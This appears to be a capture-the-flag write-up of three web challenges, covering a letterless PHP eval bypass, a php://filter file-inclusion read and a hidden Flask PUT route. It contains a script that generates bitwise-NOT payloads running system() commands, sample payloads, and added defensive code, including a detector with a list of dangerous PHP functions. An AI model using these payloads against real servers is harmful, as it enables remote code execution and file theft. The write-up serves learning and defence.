[SWPUCTF 2021 Freshman Contest] hardrce
The source is handed to us at the start; one look:
```php
<?php
header("Content-Type:text/html;charset=utf-8");
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['wllm']))
{
    $wllm = $_GET['wllm'];
    $blacklist = [' ','\t','\r','\n','\+','\[','\^','\]','\"','\-','\$','\*','\?','\<','\>','\=','\`',];
    foreach ($blacklist as $blackitem)
    {
        if (preg_match('/' . $blackitem . '/m', $wllm))
        {
            die("LTLT说不能用这些奇奇怪怪的符号哦!");
        }
    }
    if(preg_match('/[a-zA-Z]/is',$wllm))
    {
        die("Ra's Al Ghul说不能用字母哦!");
    }
    echo "NoVic4说:不错哦小伙子,可你能拿到flag吗?";
    eval($wllm);
}
else
{
    echo "蔡总说:注意审题!!!";
}
?>
```

Below the highlighted source the page prints: 蔡总说:注意审题!!!
What does all this filter out? Let me show it to DeepSeek.
DeepSeek thought for a long time and offered several payloads; none of them worked.
A quick search shows this kind of challenge is called letterless RCE: as the name says, you cannot pass in any letter characters.
https://www.cnblogs.com/pursue-security/p/15404150.html
So I asked DeepSeek to write a script that constructs the payload:

```python
import re


def generate_neg_payload(s):
    # Bitwise NOT of every byte, masked to 8 bits, emitted as %XX. The
    # URL-decoded bytes are all >= 0x80, so the value reaching PHP holds no
    # ASCII letters; PHP's ~ on a string flips every byte back to the original.
    payload = []
    for c in s:
        neg = (~ord(c)) & 0xFF
        payload.append(f"%{neg:02X}")
    return ''.join(payload)


def parse_command(cmd):
    # Accepts only the form function('argument'); returns (function, argument).
    pattern = r'^\s*?(\w+?)\s*?\(\s*?[\'"](.*?)[\'"]\s*?\)\s*?;?'
    match = re.match(pattern, cmd)
    if not match:
        raise ValueError("命令格式错误!请使用 function('argument') 格式")
    return match.group(1), match.group(2)


def main():
    cmd = input("请输入PHP命令(示例:system('ls /'):").strip()
    try:
        func, arg = parse_command(cmd)
        func_neg = generate_neg_payload(func)
        arg_neg = generate_neg_payload(arg)
        # (~"func")(~"arg"); -- a variable-function call with both strings negated
        payload = f"(~{func_neg})(~{arg_neg});"
        print("\n生成的取反Payload:")
        print(payload)
        print("\n使用说明:")
        print("1. 需要目标环境开启短标签支持")
        print("2. 确保PHP版本支持这种调用方式")
        print("3. 实际使用时可能需要URL编码整个payload")
        print("4. 示例最终形式:?code=~%8C%86%8C%8B%9A%92~%93%8C%DF%D0")
    except Exception as e:
        print(f"错误:{str(e)}")


if __name__ == "__main__":
    main()
```
Examples:

```text
system('ls');
生成的取反Payload:
(~%8C%86%8C%8B%9A%92)(~%93%8C);

system('ls /');
生成的取反Payload:
(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0);

system('cat /flllllaaaaaaggggggg');
生成的取反Payload:
(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%93%93%93%93%9E%9E%9E%9E%9E%9E%98%98%98%98%98%98%98);
```
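The same bitwise-NOT trick looked at from the defending side. This is an added example, not part of the write-up or of the generator script above: it takes the percent-encoded query string as a web server would log it, undoes the `~` on every high-byte run, and reports which PHP function names were hidden in it. It also mirrors the challenge's own letter check on the URL-decoded value, which is why the payload slips past it. The log lines are constructed, and the function and constant names (`decode_neg_payload`, `scan_log`, `DANGEROUS_FUNCS`, the log format) are assumptions of this example.

```python
import re
from urllib.parse import unquote_to_bytes

# Illustrative set of PHP functions worth alerting on once decoded (assumed list).
DANGEROUS_FUNCS = {"system", "exec", "shell_exec", "passthru", "popen", "eval", "assert"}

# A ~ followed by one or more percent-encoded bytes, e.g. ~%8C%86%8C%8B%9A%92
NEG_RUN = re.compile(r"~((?:%[0-9A-Fa-f]{2})+)")

# Constructed access-log lines; assumes the server logs the request target
# percent-encoded, as most do. The first carries the write-up's payload.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2025:00:00:00 +0000] "GET /?wllm=(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0); HTTP/1.1" 200 512',
    '10.0.0.6 - - [01/Jan/2025:00:00:01 +0000] "GET /?wllm=1; HTTP/1.1" 200 128',
]


def decode_neg_run(encoded):
    """Undo PHP's string ~ on one percent-encoded run: flip every bit of every byte."""
    raw = unquote_to_bytes(encoded)
    return bytes((~b) & 0xFF for b in raw).decode("latin-1")


def decode_neg_payload(query_value):
    """Plaintext fragments hidden behind every ~%XX... run in one parameter value."""
    return [decode_neg_run(m.group(1)) for m in NEG_RUN.finditer(query_value)]


def passes_challenge_filter(query_value):
    """Mirror the challenge's letter check. PHP sees the URL-decoded bytes, so the
    check runs on those, not on the percent-encoded text that sits in the log."""
    decoded = unquote_to_bytes(query_value).decode("latin-1")
    return re.search(r"[a-zA-Z]", decoded) is None


def scan_log_line(line):
    """Decode every parameter of one request line; report fragments and dangerous hits."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP', line)
    if not m:
        return {"decoded": [], "hits": []}
    query = m.group(1).partition("?")[2]
    decoded = []
    for param in query.split("&"):
        _name, _, value = param.partition("=")
        decoded.extend(decode_neg_payload(value))
    hits = sorted(f for f in decoded if f in DANGEROUS_FUNCS)
    return {"decoded": decoded, "hits": hits}


def scan_log(lines):
    """Run scan_log_line over a list of log lines."""
    return [scan_log_line(line) for line in lines]


if __name__ == "__main__":
    for line, result in zip(SAMPLE_LOG, scan_log(SAMPLE_LOG)):
        print(result)
```

Matching on the letters of a request after decoding is the wrong layer for this filter: the same detector shows that the byte-level view (runs of bytes above 0x7F immediately after `~`) is what distinguishes these requests, and that normalising `~`-negated runs before any keyword check recovers the function name the filter was meant to stop.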
[SWPUCTF 2022 Freshman Contest] ez_ez_php
The source is given when the challenge opens:
```php
<?php
error_reporting(0);
if (isset($_GET['file'])) {
    if ( substr($_GET["file"], 0, 3) === "php" )
    {
        echo "Nice!!!";
        include($_GET["file"]);
    }
    else {
        echo "Hacker!!";
    }
}else {
    highlight_file(__FILE__);
}
```
Roughly, substr takes the first three characters of the file parameter, so they must be 'php'; that is a direct hint at the php:// stream wrapper.
?file=php://filter/convert.base64-encode/resource=flag.php
```text
NSSCTF{flag_is_not_here} real_flag_is_in_'flag' 换个思路,试试PHP伪协议呢
```
?file=php://filter/convert.base64-encode/resource=flag
That gives the correct flag. But, but...
It turns out you can simply request /flag directly and get it.
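The prefix check seen from the defending side. This is an added example and not the write-up's or the challenge's code; it is in Python rather than PHP so it runs stand-alone. `parse_php_filter` breaks a php://filter URI into its filter chain and resource, `prefix_check` mirrors the challenge's substr test, and `hardened_check` is an assumed replacement that refuses stream wrappers and only accepts paths that resolve under an allow-listed directory. All three names and the directory used are assumptions of this example.

```python
import os


def parse_php_filter(uri):
    """Split a php://filter URI into (filters, resource), or None if it is not one.
    Shape handled: php://filter/[read=|write=]f1|f2/resource=<target>"""
    if not uri.lower().startswith("php://filter/"):
        return None
    body = uri[len("php://filter/"):]
    chain, sep, resource = body.partition("/resource=")
    if not sep:
        return None
    if chain.startswith(("read=", "write=")):
        chain = chain.split("=", 1)[1]
    filters = [f for f in chain.split("|") if f]
    return filters, resource


def prefix_check(file_param):
    """The challenge's own test: the first three characters must be 'php'."""
    return file_param[:3] == "php"


def hardened_check(file_param, base_dir):
    """Assumed replacement for prefix_check: no scheme (so no php://, data://,
    etc.), no NUL byte, and the resolved path must stay inside base_dir.
    Returns the real path to include, or None to refuse."""
    if "://" in file_param or "\x00" in file_param:
        return None
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, file_param))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


if __name__ == "__main__":
    uri = "php://filter/convert.base64-encode/resource=flag"
    print(parse_php_filter(uri))
    print("prefix check:", prefix_check(uri))
    print("hardened check:", hardened_check(uri, "/var/www/html"))
```

The parse shows why the wrapper bypasses the intent of the check: the literal `php` prefix the code looks for is the scheme of a wrapper that reads an arbitrary resource through a filter, so a string comparison on the first three bytes says nothing about which file is included. Resolving the path and comparing it against a base directory does.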
[GDOUCTF 2023] EZ WEB
The challenge page is a fake button; a directory scan turned up /src with the following:
```python
import flask

app = flask.Flask(__name__)

@app.route('/', methods=['GET'])
def index():
    return flask.send_file('index.html')

@app.route('/src', methods=['GET'])
def source():
    return flask.send_file('app.py')

@app.route('/super-secret-route-nobody-will-guess', methods=['PUT'])
def flag():
    return open('flag').read()
```
As usual, ask DeepSeek first:

```bash
curl -X PUT http://node5.anna.nssctf.cn:28256/super-secret-route-nobody-will-guess
```
It returns the flag directly. Fine, let's look at the source.
It seems to set a few conditions.
So my guess is that this is a Python backend?
I had not seen this before; now I have.
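A leaked app.py is only useful if its routes are read systematically, and that is also what a reviewer does before the leak happens. This is an added example, not part of the write-up or the challenge: using only the standard-library `ast` module (no Flask needed), it lists every `@app.route` of a Flask source with its HTTP methods and the literal file names each handler opens or sends, then singles out routes reachable only through non-GET methods, which a GET-only crawler misses but a client can still call. The embedded source is a constructed copy of the app.py shown above; the function names are assumptions of this example.

```python
import ast

# Constructed copy of the app.py the challenge served at /src.
LEAKED_SOURCE = '''
import flask

app = flask.Flask(__name__)

@app.route('/', methods=['GET'])
def index():
    return flask.send_file('index.html')

@app.route('/src', methods=['GET'])
def source():
    return flask.send_file('app.py')

@app.route('/super-secret-route-nobody-will-guess', methods=['PUT'])
def flag():
    return open('flag').read()
'''


def file_reads(func_node):
    """Literal file names a handler passes to open(...) or <x>.send_file(...)."""
    names = []
    for node in ast.walk(func_node):
        if not (isinstance(node, ast.Call) and node.args
                and isinstance(node.args[0], ast.Constant)):
            continue
        callee = node.func
        if (isinstance(callee, ast.Name) and callee.id == "open") or \
           (isinstance(callee, ast.Attribute) and callee.attr == "send_file"):
            names.append(node.args[0].value)
    return names


def extract_routes(source):
    """Return [(path, methods, files)] for every function decorated with <obj>.route(...).
    Flask's default when methods= is omitted is GET, so that is what we assume."""
    routes = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.FunctionDef):
            continue
        for dec in node.decorator_list:
            if not (isinstance(dec, ast.Call) and isinstance(dec.func, ast.Attribute)
                    and dec.func.attr == "route" and dec.args):
                continue
            path = ast.literal_eval(dec.args[0])
            methods = ["GET"]
            for kw in dec.keywords:
                if kw.arg == "methods":
                    methods = [m.upper() for m in ast.literal_eval(kw.value)]
            routes.append((path, methods, file_reads(node)))
    return routes


def non_get_routes(routes):
    """Paths that a GET-only directory scan would report as absent."""
    return [path for path, methods, _files in routes if "GET" not in methods]


if __name__ == "__main__":
    found = extract_routes(LEAKED_SOURCE)
    for path, methods, files in found:
        print(path, methods, files)
    print("not visible to GET scans:", non_get_routes(found))
```

Run against the leaked source this reports the three routes, shows that `/src` sends the application's own file and that the PUT-only route reads `flag` with no authentication anywhere in the handler, and that is the review finding: an unguessable path restricted to an unusual method is obscurity, not access control, and the source that was meant to stay private documents it.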